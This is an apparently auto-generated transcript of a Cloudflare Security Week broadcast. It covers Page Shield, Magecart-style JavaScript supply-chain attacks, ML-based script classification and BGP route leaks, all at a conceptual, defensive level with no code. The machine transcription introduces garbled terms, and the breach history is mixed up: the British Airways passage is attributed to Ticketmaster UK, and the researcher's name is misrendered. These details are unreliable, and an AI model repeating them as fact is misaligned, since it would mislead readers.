🔒 Security Week Product Discussion: Client Side Protection from L3 to L7
Presented by: Patrick Donahue, Justin Zhou, David Tuber, Andres Marisca
Originally aired on March 10, 2022 @ 8:00 AM - 9:00 AM EST
Join Cloudflare's Product Management team to learn more about the products announced today during Security Week.
Read the blog posts:
- Page Shield: Protect User Data In-Browser
- Protecting Cloudflare Customers from BGP Insecurity with Route Leak Detection
Tune in daily for more Security Week at Cloudflare!
English
Security Week
Product
Transcript (Beta)
Alright, welcome back to Security Week. I'm your host this week, Patrick Donahue. Today is Thursday and joined by another great group of product managers and security team members.
I'm here to talk to you today about something a little bit different.
So earlier in the week, we've been talking about how you protect your employees and your data centers and offices and your locations and your infrastructure.
Today, we're talking about protecting your users. So I'm joined by a group here.
I'm going to let them introduce themselves. And so we're going to start with Justin and Andres and Tubes.
If you can tell us what your name is, what your role is and what you're focused on here at Cloudflare.
Great. Thanks, Pat. Hey, everybody.
I'm Justin. I am in product here at Cloudflare working on client-side security.
So ever since I started at Cloudflare, my focus has been sort of tackling software supply chain, you know, challenges in the client.
So helping protect your customers.
To you, Andres. Thank you, Justin. So my name is Andres.
I'm effectively working as a machine learning engineer. I'm working for the security team at Cloudflare, mainly on securing our internal systems.
I am actually working out of Lisbon as well.
And I've been collaborating with the production team in a few ideas and a few research topics that we've been quite interested in lately.
To you, Tubes. Hi, my name is Tubes. I am a product manager for network and availability.
And I'm based in Seattle, Washington. And I think you probably have the best nickname for being our network product manager.
Tubes, I mean, we couldn't have designed it in a better way.
Yeah, it's totally designed. Well, my initials are PRD.
And so, you know, everyone thinks when I'm talking about product requirements, I've got a natural name for product management, but you've got one even more tailored to network product management.
So terrific. So Justin, I want to start with you.
So let's talk about client-side security in the announcement you made today about PageShield.
I think, you know, if I think back to building my first web page, you know, it was some very basic editor where, you know, I was opening it and writing a few, you know, HTML tags by hand.
And, you know, it was really a very static web page and didn't have any dependencies.
You know, this was, you know, in the 90s, right?
So there wasn't a whole lot of things to draw on, but that's changed, right?
Tell me about how web pages are built today and sort of what is involved in building a page today.
Yeah. So what we've seen over time is that third-party vendors have specialized harder and harder into things like analytics, marketing, tracking, customer success, payments.
And because of that, the amount of third-party JavaScript on websites has steadily increased over time.
And this has also happened as sort of, you know, you've got like different teams within large organizations shipping code and just inserting pieces of JavaScript that they need for their particular functions.
And then what you end up having is this like huge dependency graph across your application where you have often dozens or even hundreds of JavaScript files that are pulled in from external sources, not under control by you or your team.
Yeah. And so for those at home that aren't familiar with JavaScript, like what can you just tell a little bit about the language and how is it used within the browser?
Yeah. So JavaScript is essentially today the core kind of logic layer among both front -end applications and a lot of back-end services now.
So it is essentially the bread and butter of what every, you know, full-stack web developer uses nowadays.
And because of that, you know, third-party JavaScript is incredibly ubiquitous.
Right.
And so like you have, you know, going back to me in the nineties, right. If I were wanting to use, you know, early JavaScript coming out of, you know, Netscape and Marc Andreessen and crew, like being able to write some basic functionality to do something dynamic, that's evolved quite a bit.
Right. And so there's a lot of stuff today where you're making, you enter the sort of dynamic network calls, right.
Where you're able to take user input and send that somewhere, whether it's, you know, directly from the browser or submitting through a form.
We obviously have the Cloud for Workers ecosystem and framework to run, you know, JavaScript server side.
And so it's really ubiquitous now in the web development world.
Right. And so it's great. It can let you do a lot of things and build really rich dynamic experiences, but there's some dangerous parts of it.
Right. And so there's some concern in terms of running in the browser.
Can you speak a little bit about that?
Yeah. So JavaScript files running on your application have access to network requests and access to local storage cookies.
They have access to, you know, the DOM.
Right. And because of that, JavaScript can essentially look at anything that is happening on your application.
And this includes, you know, very sensitive information like PII, credit card numbers, login credentials.
It really has a ton of power once it gets into a customer and browsers and therefore also a potential attack.
Yeah. And so if you were tuning in earlier this week, we launched a remote browser isolation, which is a way to protect your employees.
Right. And so if that JavaScript is running locally on your machine and it's compromised, as Andres can get into depth here, there's a lot of concern where, you know, accessing local data and exfiltrating it and compromising the machine itself.
But today we're focused on protecting the end users. And so if you're serving JavaScript to your customers, there's risk here.
Right. I think that the most obvious example that people are familiar with, the canonical one we talk about when we talk about client side security at the application layer is Magecart.
Right. What is Magecart? And can you provide a little bit of history and context there?
Yeah. So Magecart is a threat model where hackers have decided that because you're seeing dozens and even hundreds of JavaScript dependencies that are loaded in externally on the client that, you know, at least one of them is in a poorly protected host server.
So hackers have basically scoped out websites and attacked the weakest link of your external JavaScript dependencies and then gain control over the source code that is served to your end users browsers.
And because of that, once you gain control to that source code, you can do all sorts of, you know, malicious stuff in the browser, such as stealing, you know, credit card numbers, you could be, you know, malvertising, you can be sending customers malicious domains.
So gaining control over client side JavaScript can be really devastating for your applications.
Yeah. I've known, I've gone to certain sites and I think it's, you know, a bad ad and you see the browser just sort of refreshing and going from page to page.
And then I hear my CPU, you know, I hear the fan spinning up on my computer.
Right. And so there's a broad range of things that someone's looking to do.
Right. So it sounds like you mentioned the exfiltration of sensitive data, but what are some of the other things that you see JavaScript being used for nefarious reasons?
We've seen a lot of sort of like malvertising, right?
Where advertisement pops up that you, the application owner never put on your site and customers and users would mistakenly click on that and they get taken to a phishing domain where, you know, their information might be stolen from them.
We've also seen crypto jacking where essentially once hackers gain control over JavaScript, they have that JavaScript mine cryptocurrency using your browser resources and that, you know, damages your end users overall experience and slows everything down.
Anders, I think you wrote about one of these styles of crypto jacking attacks that's going to be in a blog post that will be published soon on the Cloudflare site.
It was a great read, went through it last night. Why do people do this?
And you mentioned something about GPUs, like what is the desire there to take advantage of that?
Well, effectively with the crypto market, as it's been booming and constantly going through that boom-bust cycle, like the price is constantly fluctuating, it's quite expensive for pretty much any normal person to be able to mine any cryptocurrency because that deteriorates your actual hardware.
You're probably overheating your components, you're utilizing a lot of electricity and to break even is quite unlikely to happen unless you're a massive enterprise.
So effectively what the bad actors are doing, they're utilizing your computer, your energy to mine cryptocurrency that's often being effectively siphoned for free on their end.
Yeah, and one of the things I was really excited about on the remote browser isolation, just to go back to earlier in the week, I was talking to Tim, who's the product manager for that offering.
And I think when we're seeing a lot of people run their browsers server side with us and doing the network vector transmission to render it efficiently client side, one of the things we can look at is that CPU utilization of sites.
And so I think if we've got millions of people using this and we've got some baselines on how much CPU could be consumed, that feels like some good information maybe from a data science perspective that you could start to look at and develop some ways to identify some outliers there I would imagine.
Yes, definitely. Like using anything from the baselines for CPU and the GPU is especially useful because of things like WebGL where it's going to be significantly harder to have tracing going on there.
So being able to just have the execution baselines, we're able to quickly identify things that would otherwise be far more complicated to do so.
Great. And Justin, talk to me a little bit about the, so just going back to some of the attacks that you've seen and that you've looked at specifically, I think one of the ones we hear a lot about is British Airways.
Can you explain what happened there and maybe some other ones that you've been focused on?
Yeah. So British Airways is one of the examples of a software supply chain attack where they had a self-hosted piece of JavaScript, Modernizr 2.6.2, that was compromised by attackers.
And this was one of the first really high-profile attacks that happened.
And for several weeks after the compromise, this newly infected Modernizr script would basically steal credit card information.
And what's really dangerous is that client-side attacks can often be even more damaging than compromise the origin because on the origin, you're not holding CVV, you're not holding expiration dates, right?
Whereas hackers get all of that in the client and they can instantly basically begin using these credit card credentials to make fraudulent purchases.
And we saw that with the customers that were affected by this attack where they saw large amounts of credit card fraud.
Got it. And what were some of the other examples you saw? I think British Airways is a common one.
And actually, what ended up happening there before we move on?
So it sounds like it went undetected for a bit of time. What ultimately happened there?
How long? And were there any repercussions there for them?
It was approximately two or three weeks response time. And then they got hit with a large fine from the information commissioner's office in the UK.
This was Ticketmaster UK specifically that was compromised.
It was approximately a $200 million fine initially.
And then they've also in the process of settling a class -action lawsuit with all the customers that were affected.
And it was approximately somewhere between 400,000 and 500,000 customers that were affected by this breach.
Got it. Yeah. I think the thing for me that we think about a lot is how do we protect our users, our customers' privacy and data?
And we spend a lot of time.
We launched something in the team where we can encrypt any sort of payload that's matching a WAF managed rule in a way that nobody at Cloudflare has visibility to that data, right?
Only the customer who's provided their public key. And we wrote about that on our blog.
I think if we can extend that to our customers' customers, I think that's even better if we can give them that integrity of their data and privacy there.
What about, I guess, I think one thing we didn't get into before we move on is why are people pulling this in and how are they pulling it in?
And so I think there's one attack that Andres wrote about called, I think it was dependency confusion, which was really interesting to me.
But if you think about building a modern application today, you're not writing every last capability, right?
It's just you would never build and finish an application. And so you're going to be pulling in components that are published elsewhere on CDNs that are hosted and pulling those in and helping you kind of quickly get to market with your application, especially in a competitive space.
Andres, can you tell me a little bit about that dependency confusion attack?
That was a really interesting one that I saw you write about.
Yeah, this one's a fairly recent one.
It was published last year. And I thought it was particularly interesting because the idea was that a security researcher, Alex Pearson, he actually identified PayPal and a few other companies had some of their internal code being referenced within the code.
So for example, if you have something like Cloudflare, internal Cloudflare function, and what he did is release into the NPM package manager, equivalent public package with the same name and a higher version number.
That effectively would always supersede our internal package and it would effectively be the one chosen.
With that, effectively, he was able to compromise numerous massive enterprises, including Uber, Microsoft, PayPal.
I think the particular part of that, something like that actually can happen.
And it's something that we're privacy-centric, being able to get all of that information internally.
Like for example, if you're using something like a page shield, you will be able to track that no such event, no such function call is actually commonly used.
And this was a new dependency and something is going on. And that's the type of thing we want to be able to track and identify early before an actual real incident happens.
Yeah, that was a really interesting attack in my mind. And thanks for the context there.
I think what I found particularly interesting was that priority system where if you've got, you're pulling in some dependencies and you're able to publish something publicly versus the private repository and having a higher precedent, even if it were named the same, being able to take that over.
And then that JavaScript, as Justin talked about is very capable and what it can do.
And they were actually pinging out.
And I think the security researcher in this case was pretty scared or shocked in terms of how many big, large enterprises had that compromised JavaScript that was running and pinging out to this infrastructure.
So I want to talk about PageShield.
So thanks for the segue there. Justin, big announcement today.
We've been tracking this space a lot, thinking about how we can come out and do something that is unique given where we sit on the Internet, between the browsers and our customers infrastructure.
Tell me about what is PageShield?
What do we announce today? Yeah, of course. PageShield is Cloudflare's ambition in sort of the client-side security space, right?
Where a lot of customers have written in and say, hey, you're doing a great job protecting our origins, but we're worried about client-side, right?
We don't have any telemetry, we don't have any tooling to be able to detect or prevent these attacks from the client.
And we really want that ability for compliance reasons and also because we're really scared seeing all these big brands get hit by MageCart style and other client-side attacks.
So this has been a top priority for some of our customers to get out and we're happy to sort of serve their needs.
And tell me about some of the initial functionality.
I know you have a big, long roadmap and we've been working together on that and excited to see you continue to partner with Andres and team about a lot of the machine learning that we're going to be doing What is available today for customers to get started using?
Yeah, so what's available today is a feature that we call ScriptMon.
And what it does is it uses a browsing technology called Content Security Policy to get telemetry around what JavaScript files your application is pulling in on the browser side.
And it alerts you as the application owner when new JavaScript dependencies appear on your site.
The idea being that this is a really interesting security event. New things are happening on your site that you aren't under control of directly.
And therefore, you should check it out and make sure that this was an expected change and not anything malicious happening on your site.
Got it. And so if we detect this, talk about how we detect this and how we let people know what's going on and sort of what does that process look like?
What are those hooks? Mm hmm. Yeah. So this goes back to sort of like our browser technology, not our browser technology, standard browser technology, content security policy.
And what that does is it allows you to send an allow list of good things to the browser.
And anything other than that is not allowed to execute.
So what we did was we sent a report only version of content security policy, which doesn't block anything from executing.
But but still gives us telemetry on what's going on via violation reports that we consume.
And because of that, one script monitor is turned on for your cloud player zone.
We constantly get data points from your end users about what JavaScript files are by their classes.
And we can compare against what we've historically seen and let you, the application owner, know when things are new.
And so I know we've had a number of conversations with customers that are looking to adopt and deploy this and are in various stages of that and sort of a preview early access mode.
But what are you know, how are they thinking about the alerting versus the blocking?
I know, you know, they've looked at some other solutions that try to use CSP for blocking and there's some challenges with that approach, right?
Yeah, I think the challenges in content security policy are pretty well documented here because it's challenging to maintain a high quality allow list.
We actually explored that internally for a while and then decided that basically, you know, if a customer deploys new code without proactively updating their allow list, then they will break the site and that specific site functionality for their users until they're able to update the allow list.
And we thought that, you know, there are a lot of merits to a positive security model, but we as Cloudflare can do better as, you know, our face as, you know, a reverse proxy, right?
So we actually want to do a negative security model blocking for our customers and that way, you know, remove the reliability concern of going with CSP, vanilla CSP allow lists and really have easy setup, easy maintenance for our customers.
Yeah, and I think in hearing conversations with some of the partners we're talking to, some of the e-commerce platforms and e-commerce sites, what it seems like we're hearing is they want to get notified, you know, the second we see something potentially malicious and we'll get to the malicious detection part in one sec.
But I think we heard one say, you know, I want my pager to go off.
Another one to say, I want to be, you know, called immediately when that happens.
And so you've been integrating with the Cloudflare notification system, right?
The one that we use for other products. Exactly.
Customers in the ScriptMara dashboard are able to set up either an email or pager duty alert around, you know, differing security thresholds based on what's important for them to see.
Cool. And so, you know, let's go beyond the new script detection and some of the, you know, the new domain scripts running on new domains.
I do think there's some really interesting angles there as we talk to the Teams group and our threat intelligence group, you know, on earlier in the week.
And I know we're excited to leverage a lot of the data that they are tracking on domains.
And I think there's a lot of synergies there between the data sources and the offerings that we're looking at here.
In particular, you know, remote browser isolation and gateway and things like that.
But let's talk a little bit about the change detection and whether or not that change looks, you know, innocuous or something that, you know, our customers may want to drill in a little bit on.
And so, let's get into that a little bit and we'll bring Andres in to help me understand that better.
Yeah. So, as an initial context, what we want to do immediately after ScriptMara, which is, you know, available for closed beta customers today, is actually begin looking at the JavaScript files themselves, right?
So, telling customers that new JavaScript files are executing is an important first step.
But we can do better here as well, right? And so, what we want to do and what we're actively building right now is fetching JavaScript dependencies over time and versioning them.
And that way, when the code behavior changes, then we can alert customers that, hey, you put this piece of JavaScript on your site a while back.
Today, it changed and it's now doing something new. You should take a look and make sure that this new functionality is something you expect.
And this is because, you know, sort of the core kind of challenge with Magecart is that you're taking a JavaScript file from a trusted vendor and changing it to a malicious state, right?
And there's a point in time where that happens and we want to help customers understand that timeline and do something about it, you know, as soon as it happens.
Got it. So, we can alert when a trusted path, you know, that the contents changes.
But tell me a little bit more about what you mean by the behavior changes and what are some approaches that we've been experimenting with to figure that out?
Yeah. So, what we've been experimenting with is essentially what defines the same JavaScript file, right?
And it's actually a more challenging question once you dive into it because what we find is that you often have the same file, but it's maybe trivially different for all your end users.
Maybe there's like a UUID as a string token.
Maybe there's, you know, a geographic location or a timestamp.
But essentially what that means is doing a basic string comparison or a basic hash comparison doesn't work in a ton of cases, which is one of the key reasons why, you know, some resource integrity works in very specific use cases, but not as a general use case to protect against, you know, MageCard.
And so, what we want to do is come up with a code versioning system that is resilient to these kinds of trivial things, right?
And what we settled on was a technology or a concept of abstract syntax of the JavaScript itself, which is actually mapping out variable calls and method calls and how they, you know, are structured in the file.
And, you know, sort of removing the string tokens, removing the variable naming such that, you know, we're just looking at the structure of code.
And that way we can have, you know, a way less noisy way of figuring out when JavaScript goes from version A to version B.
Yeah. And I think that's really important to reduce that noise, right?
The last thing an administrator wants is that security fatigue, right?
Where they're getting alert, alert, alert, you start tuning that out and you're not looking into it.
And so, I know that you've been, you know, working on some of these models and actually trying to benchmark our detection against some, you know, known bad malicious JavaScript.
Can you speak a little bit about, you know, how you and Andres, and maybe this is a better question for Andres, how have you been trying to identify and benchmark our efforts in this case?
I can start and I'll pass off to Andres.
And huge, you know, props to all the team members involved in doing this work.
It's really cutting edge, you know, cyber security work here. And it's great that everybody's been involved so far.
But what we've been doing is essentially taking samples of known JavaScript malware and known Magecart malware and then training models against benign JavaScript that we've seen both in the wild and, you know, what we serve over CDNJS, right?
And by training these together, we can, you know, build classifiers around what is a, you know, benign piece of JavaScript and what is a malicious piece of JavaScript.
And we've actually, you know, internally proven really, really strong accuracy.
And we're working on sort of further refining our methods moving forward.
Now, I'll pass to Andres.
Yeah, I think Andres, it would be great for the audience to hear is like, how does that actually work?
Like, everyone hears, okay, we do machine learning and training, but what does that actually mean?
That's perfect. Thank you, Justin.
Well, effectively, I think I want to make sure everyone understands that there's a constant feedback loop happening across us.
Like, I'm in the security team, they're in the production team, and we're constantly communicating and working and researching things together.
So, I think, like, one of the important elements here is that Cloudflare is reaching a very particular point where we have a convergence of technologies.
And that's what's going to make us a very strong player in this specific use case.
We have everything from being able to host a massive amount of JavaScript in CDNJS, and we have things like browser isolation, where we are able, for example, to execute and extract all the call graphs and everything that there.
We're able to gather that data. So, we can go beyond, like, static analysis and the traditional methods that you would otherwise use.
And one of the things that I think is important is to explain, like, why are the things that we're doing actually useful?
By effectively labeling our data, we are able to teach our algorithm that a specific instance of, like, the abstract syntax tree and the call graph, so how our JavaScript behaves, will map to a benign or a malicious use case.
So, that way, we're able to, like, with a certain degree of accuracy and constantly updating that as new cases occur, we're able to both incrementally improve our accuracy and become better over time, whilst also attempting to detect features that might not be directly visible to us as users.
Like, we are aiming to also gather the features that would catch something before it's actually a well-known problem.
And that's one of the biggest benefits of going through machine learning methods.
And I think it's worth mentioning that we are also, like, looking into what's ahead, what comes after.
We have something like supervised learning at the moment, where we're working on labeled data and increasing our over time, effectively.
We have an active learning capability based on that.
As new things come on, we're able to label new edge cases that would otherwise have been missed, and all of a sudden, the algorithm is able to adapt.
Now, being able to gather all of this information, we have things like the abstract syntax tree.
With our browser isolation, we can get the call graph and the dependency graph.
And also, we are able to get the side effects. Things like when something calls home, when there's actually a fetch or a request where it goes, we are able to cross correlate that with actually our domain knowledge for all the domains that we host.
And I think that's where different convergence of technologies, like the graph neural networks, can become very, very strong, where we're able to effectively create embeddings.
And that's somewhere where I think it's important to mention.
An embedding is something like we convert the understanding of that call graph into a specific set of numbers, a numeric matrix.
And with that information, we are able to effectively begin tapping into far stronger algorithms that work at the scale that Cloudflare operates in.
And I think that's where the power lies.
We're able to get similarity retrieval, which, for example, in this case would mean we know this specific byte code or minified JS is going to call to a specific server.
How do you actually map that against somewhere that has a completely different minification based on the different variables that they used, or even they use some obfuscation methods?
We want to be able to cross correlate and identify when that occurs.
And I think that's why the breadth of data that Cloudflare hosts is quite powerful.
Yeah, I can imagine being a data scientist is probably a pretty fun place to work.
The sheer breadth of data across both the forward proxy and the reverse proxy use cases, all the different products, I think, coming together and a lot of that threat intelligence that we're servicing ourselves and being able to put back into the product.
So hopefully you're having some fun working on some of these data sets.
One of the things that I want to get to too in a second to talk about the client side attacks on the networking side.
But Justin, just to wrap up with you, what are some of the areas, if you're in particular industries, are there industries that are often faced by these threats?
And Michael, where's a lot of the interest coming from in some of your early conversations?
Yeah, we've seen most of the interest coming in from our e-commerce customers, where essentially they've seen all these attacks where this JavaScript is executing in their checkout flow.
And we've actually also seen customers that have explicitly decided not to put any external JavaScript on their checkout flows because they're worried about this threat model.
And so we also see some financial services and other companies as well writing in and asking about this.
But essentially any application where there is critical customer information is a fair game for any kind of nature attack.
Yeah, I think that's how I think about it, is if you've got a site that somebody's entering sensitive information that you wouldn't otherwise post publicly on the Internet, that's probably something where you want to make sure that your browser is not talking to some site.
I think one of them we saw recently, Andres, was something something stats.com.
It was like a legitimate domain and they appended stats .com into the JavaScript to send it there to make it look kind of fly under the radar if someone was reviewing that code and saying, oh, this is maybe something that is innocuous.
And I know that we're looking at, and especially on the gateway side, one of the most common threats you're seeing is domains that are newly created, right?
And so we can use a lot of that intelligence to say, is all of a sudden your user's browser trying to send stuff to a domain that was registered in the last 30 days, for example?
That seems like a pretty strong signal that we've seen.
So what about sending that data back through Cloudflare, Justin?
I know you've been thinking through that a bit. Talk to me about you hear client-side WAF, for example, and you hear technologies like that.
What are your thoughts around that as a potential path in the future? I think the client is sort of the final frontier in terms of building really great security posture.
We have this sort of model around the Internet right now where the requests that are going to your origin, if you're a Cloudflare customer, flow through Cloudflare, and it flows through our WAF, and we're able to sort of detect and stop attacks in real time.
But then there are all these other Internet web requests that are going to unknown host origins.
They're pulling assets, they're sending data outward, and it's actually really hard to get telemetry into what data is going where.
And we want to basically, moving forward, help customers gain a better and better understanding of what's going on there, and help them lock down their client from the security posture and really have great telemetry.
Terrific. That's really exciting.
I'm going to start running this on my single-page website, but not a whole lot of sensitive information going.
Excited to start to deploy some of those products.
And if people are interested and they want to get started using this and having discussions with you, how do they get in touch?
Yeah. So, on the blog post and on the landing page for PageShield, there is a form that you can fill out, and essentially that will be routed to us so that you can join the wait list for the closed beta.
And then we will be popping folks off and then hopefully very soon releasing to the general public after we're finishing the beta.
That sounds great. And I think one of the things that's really fun about building product here, especially in the early stages of a new offering, is getting that customer input and having an opportunity to shape the direction.
I know that you and I have been having with some really strategic customers over the last couple of weeks, and the input that they've given has been super valuable, I think you would say, in terms of roadmap and direction.
Exactly. Yeah. We build product basically by listening to our customers here at Cloudflare, and I think that has been really meaningful in the PageShield case.
Terrific. All right, Mr. Tubbs, I want to start talking about the network side.
So, PageShield, of course, will help customers lock down their web applications and JavaScript.
Talk to me about the threats on the network side.
So, if we're going to deal with traffic that's flowing out at layer seven, obviously, if you step down the OSI model to layer three, you've got some network threats there.
But before we get into that, I want to help, similarly, provide some context for people.
And it's actually one of my favorite interview questions for somebody technical coming into Cloudflare that I'm going to ask you and put you on the spot here, and we're going to go through from a network perspective.
But how does traffic flow if I'm here in Austin and I'm typing in some website that's on Cloudflare and I hit enter, how does that traffic flow from my machine to a Cloudflare data center and a user's, I'm sorry, a customer's origin and then on back at the network level?
Can you take us through that? And then I'm going to have some questions about some of the threats along the way.
Yeah. So, I think before we kind of get in, it's useful to define some terms that will be helpful for understanding kind of different connectivity models within the network.
So, there's a concept called unicast. And unicast routing is basically when you ask an authority, I need to get to site A, what is the IP for site A?
And the authority will return back a single IP and that IP will map directly to a machine or a set of machines under a load balancer or one IP address.
And site A may have multiple different locations, but each location has one IP address.
And those sites and the way that which those sites are distributed to customers can change.
You can have DNS-based routing.
You can just do round robin. There are a lot of different ways to allocate addresses and allocate capacity out.
Then you can manage that through unicast.
And then there's multicast. And multicast is probably best described by a TV station.
Every single TV station, like ESPN, broadcasts to every single TV.
And you just have to change the channel to be able to receive the feed. But ESPN just broadcasts multicast to everybody.
And then there's anycast. And anycast is like, it's a form of unicast, but the way that anycast distributes its IPs or its server side connection or who to connect to is through this method called BGP, which stands for Border Gateway Protocol.
And essentially what BGP is, is it's a way for different autonomous systems on the Internet to exchange routing information with each other.
And that routing information is basically broken down by hops and local preference.
And what this means is, is that anycast routing is basically some sort of heuristic that says, if I want to connect to this resource, everyone on the network knows how far away they are from that resource and can route you accordingly and can route you to the closest instance of that resource.
And BGP intrinsically defines that model of closeness so that everybody can speak the same language more or less.
And so when eyeballs connect to Cloudflare, they use this anycast model.
Cloudflare advertises all of our IPs everywhere.
And a user will attempt to say, hey, I want to go to a resource that's hosted on Cloudflare.
And the Internet at large, let's say, basically says, OK, if you're in Seattle like me, I know that the closest status, I know that the closest instance of these IPs is in Equinix, Seattle, which happens to be down the street.
So my traffic literally just travels a few blocks and then ingresses into Cloudflare, at which point Cloudflare takes that and says, OK, so I know that this person came in here.
And they need to go to site A, whose origin is hosted in Quincy, Washington.
So basically, that's on the other side of the state. So they will say, hey, I need to talk to this origin.
And they will find the shortest path via BGP through a bunch of different transits or direct P&Is that we have with cloud providers.
And then it will route there. And then it will come back. And then it will take a path that we hope is similar but is also just optimized based on how everybody connects on the Internet.
And it may be asymmetrical. But we hope that it's as close to similar as possible.
You passed the interview question with flying colors.
I think you'd make it on to the next stage. I really appreciate the depth of that answer and all the aspects of it.
I want to drill in on a couple of things you said just to clear it up.
Because I some people may not be familiar with some of the terms.
So you mentioned autonomous system. What is an autonomous system?
So an autonomous system is a set of kind of, it's basically, the way that you should think about this is essentially, it's a network who all share the same space.
And basically, it says, a good example would be Cloudflare. Cloudflare has a bunch of different has a bunch of different address spaces that all live under the same Cloudflare umbrella.
So they are assigned an autonomous system. And one organization can have multiple autonomous systems for different purposes.
So for example, Cloudflare actually has multiple autonomous systems that we use for different purposes.
Lots of different entities have different autonomous systems.
But it's basically a way that we can group prefixes together to assign them some sort of kind of space in the network.
And when you say hops, so you mentioned hops before, is that between, what is that between?
And how do kind of autonomous systems fit into that picture?
Yeah, so that's a really good question. So if you take, you know, the or if you take the path of, you know, Cloudflare reaching a customer origin, the customer origin, let's say is hosted by is hosted in Microsoft.
And Microsoft, you know, usually we have direct peering with them, which means that when we say, hey, I want to go to Microsoft, the router will say, okay, well, I have a path for you that only takes one hop, you will go from my from RAS, which is 13335, to the Microsoft AS, which is 8075.
And that's one hop, I were either directly peered, or in some cases, we even have PNIs that directly plug into our routers.
So we can say, hey, this hop has a very low distance, we should prefer that.
That's not always the case. Some origins are hosted in places, and some origins and some locations are don't have optimal peering, we don't have direct, you know, one hop connectivity with every provider everywhere.
So sometimes we have to take additional hops to get there, we have to go through transits.
And that's what the purpose of transits are for. They're basically for interconnecting different networks together, so that traffic flows over them, so that, you know, they as a provider can make money.
And, you know, the origins can have increased connectivity by saying, hey, I'll get my transit through this transit provider.
And some transit providers, you're probably familiar with their cogent, level three, which is also known as Lumen or CenturyLink.
And GTT and NTT are some really good examples of big transit providers.
And so those, when you connect to an origin via these networks, you actually add an additional hop, right?
The hop is counted by the number of networks that you have to go through to get to your goal.
And that may be one, it may be two, in some cases, it may be three.
And hop count is actually very important, because in many cases, hop count actually has no relation to physical distance.
It has to do with logical network distance.
And this actually manifests itself in really interesting ways.
And I know this is kind of off topic, but it's interesting. Johannesburg, South Africa, is actually most closely connected with London, England.
So you would think that if you're trying to get to a resource in, you know, somewhere else in Africa, you would just, you know, go in through the transit in Johannesburg, and then go through a different, you know, you would just go in through a different network that's located in Nigeria, back to the origin in Nigeria.
But what you actually find is, is that what oftentimes happens is you end up going into London, and then back out, because that is the fastest path according to the network.
So networks, network hop counts are usually closely correlated with distance, but they're not always.
And so you mentioned something related here, which is preferences, right?
What are preferences? Yeah. So preferences are basically a way of ordering connectivity, assuming all of the hop counts are equal.
So if I have, let's say, if I'm connecting back to Microsoft, in my Microsoft case, I may have a PNI with Microsoft, which is a physical cable between our router and their router.
I may have a direct peering session, and I may have an Internet exchange.
All of those are around the same hop count, except for the IX. But how do I choose between the direct peering session and PNI?
The answer is I establish a local preference.
And BGP sort of specifies this, right? It basically says any connection in which I'm directly plugged into the router has a higher preference than, has a higher preference than one where I'm indirectly connected.
But you can override those based on your own weights.
And so Cloudflare, when we do our traffic management, that's sometimes how we shift traffic around between transits and providers.
If one transit is congested, we may de-preference it in favor of another to move traffic over to a different transit to free up congestion.
Great.
That was really helpful. Thank you. So you talked about us announcing our IP prefixes to our networking neighbors, right?
So we're telling the people that we have these direct connections with and others how to reach Cloudflare's network, right?
How do you think about that, though, from a customer IP prefix side, right?
So we launched a product, the network layer called Magic Transit, which allows us to take a customer's data center and attract all the traffic that was headed there, perform some DDoS mitigation and traffic acceleration, and send it on to their origin and do what's called a direct server return, right?
And so that asymmetric routing you were talking about.
But how does everything you described fit with our customer's IP spaces in terms of Cloudflare?
It's a very good question. And the answer is pretty simple.
If we want to attract traffic for a customer, we have to be advertising their IPs on their behalf.
And so part of onboarding to Magic Transit or any BYO IP offering that we have, we have those for Spectrum and Layer 7 CDN as well, is that part of that agreement involves a customer telling everybody else on the Internet, hey, Cloudflare is now announcing our prefixes on our behalf.
So we're basically adding them into our ASN and basically making them a part of our network.
And as a result of that, they get to leverage the speed and the power and the reachability that Cloudflare's network provides.
Yeah, I actually find it really interesting.
So I know we've got a great roadmap in terms of the things like Argo Smart Routing and all the networking capabilities of how we're accelerating traffic and riding over our private backbone.
Our CTO has that graph he likes showing of the speed of light, pretty constant over time and our ability to kind of get close to that.
And we're relying on a lot of those capabilities. But pretty interesting to see just performance increasing even prior to some of these additional layers, just based on the sheer connectedness of Cloudflare's network and from a pocket loss and congestion perspective.
So let's talk about some of the threats here.
There's a really helpful overview of how traffic flows. And I know that it's really useful to us as we deal with things like DDoS mitigation.
So to the extent that we can spread that traffic around the world and block it as close to the source of that traffic as possible, the better it is.
And the inability for attackers to target specific data centers, I think you saw many years ago or not many years ago, several years ago with Dyn, I think they were focused on some regional capacity and knocking their DNS servers offline.
And obviously, we're kind of spreading that out just around the world.
Let's talk about some of the threats there though, right?
Because I'm sitting here and I'm fortunate enough to have AT&T as my Internet provider.
And fortunately, I do have a nice gig connection, but I don't have much control over that route, right?
If I'm trying to go to a site, maybe that's protected by PageShield and I want to actually get to that site and interact with it.
Maybe it's a cryptocurrency site, it's Coinbase and I want to go play some trades or something or buy some cryptocurrency.
That path is pretty much dictated to me, right, by my ISP?
Yeah. So we've talked up to now as to kind of the benefits of BGP and what that provides and kind of an inherent pathing and optimization structure.
But there are definitely some drawbacks. And one of the biggest drawbacks about BGP is that it's inherently insecure, that everyone in the network just assumes that if you're announcing routes, then that's accurate.
There was never any security inherently built into BGP.
There's no real way to identify or to ascertain from a provider perspective or from a transit perspective that the routes that this person is announcing are accurate.
And to kind of work around this, we have this process called LOAs and IRR updates.
And essentially what we do is we update our Internet registry records and we send LOAs that basically say, for Magic Transit at least, hey, we're advertising these routes on behalf of the customer and here's a document that the customer has signed that proves that we're allowed to do this.
This is kind of how the Internet has been working for a really long time and it's been relatively successful, but there have definitely been a lot of really big oopsies along the way.
And this can manifest itself in kind of one of two ways.
One way is just kind of up a nevel and a provider accidentally announces routes that it doesn't have the right to.
And when you see that, typically it manifests itself in what we call a route leak.
And what this means is that, and a good example was listed in the blog post that was just released today, that in 2019, a local Internet provider in Allegheny, Pennsylvania started announcing routes for Cloudflare, Lino, and Amazon.
And what this means is that in a normal world, if this local provider is announcing the same routes as I am, then as I Cloudflare, then Cloudflare will be preferred because they're all the same and you trust the thing that you know.
But what happened was this local provider actually broke down our routes into sub -prefixes.
So if we were announcing slash 20s, Allegheny, the provider in Allegheny, Pennsylvania was announcing slash 21s.
And an interesting thing about BGP is that BGP prefers a more specific route.
So if you announce a more specific prefix, BGP will prefer that.
And that's exactly what happened, that because Allegheny was using something called a BGP optimizer, they had misconfigured it and were starting to announce sub-routes or de-aggregates of arc slash 20.
And all of Cloudflare, Verizon, Google, and Amazon's traffic and Lino just funneled into this small provider in Allegheny, Pennsylvania.
And this is something that was totally innocuous, right?
Like it wasn't obviously something that they intended to do, but it happened.
And what that causes for a customer is that causes slowness, causes failures, because you're essentially just, and this is the metaphor I use in the blog, it's like taking five lanes of traffic and then condensing them into one.
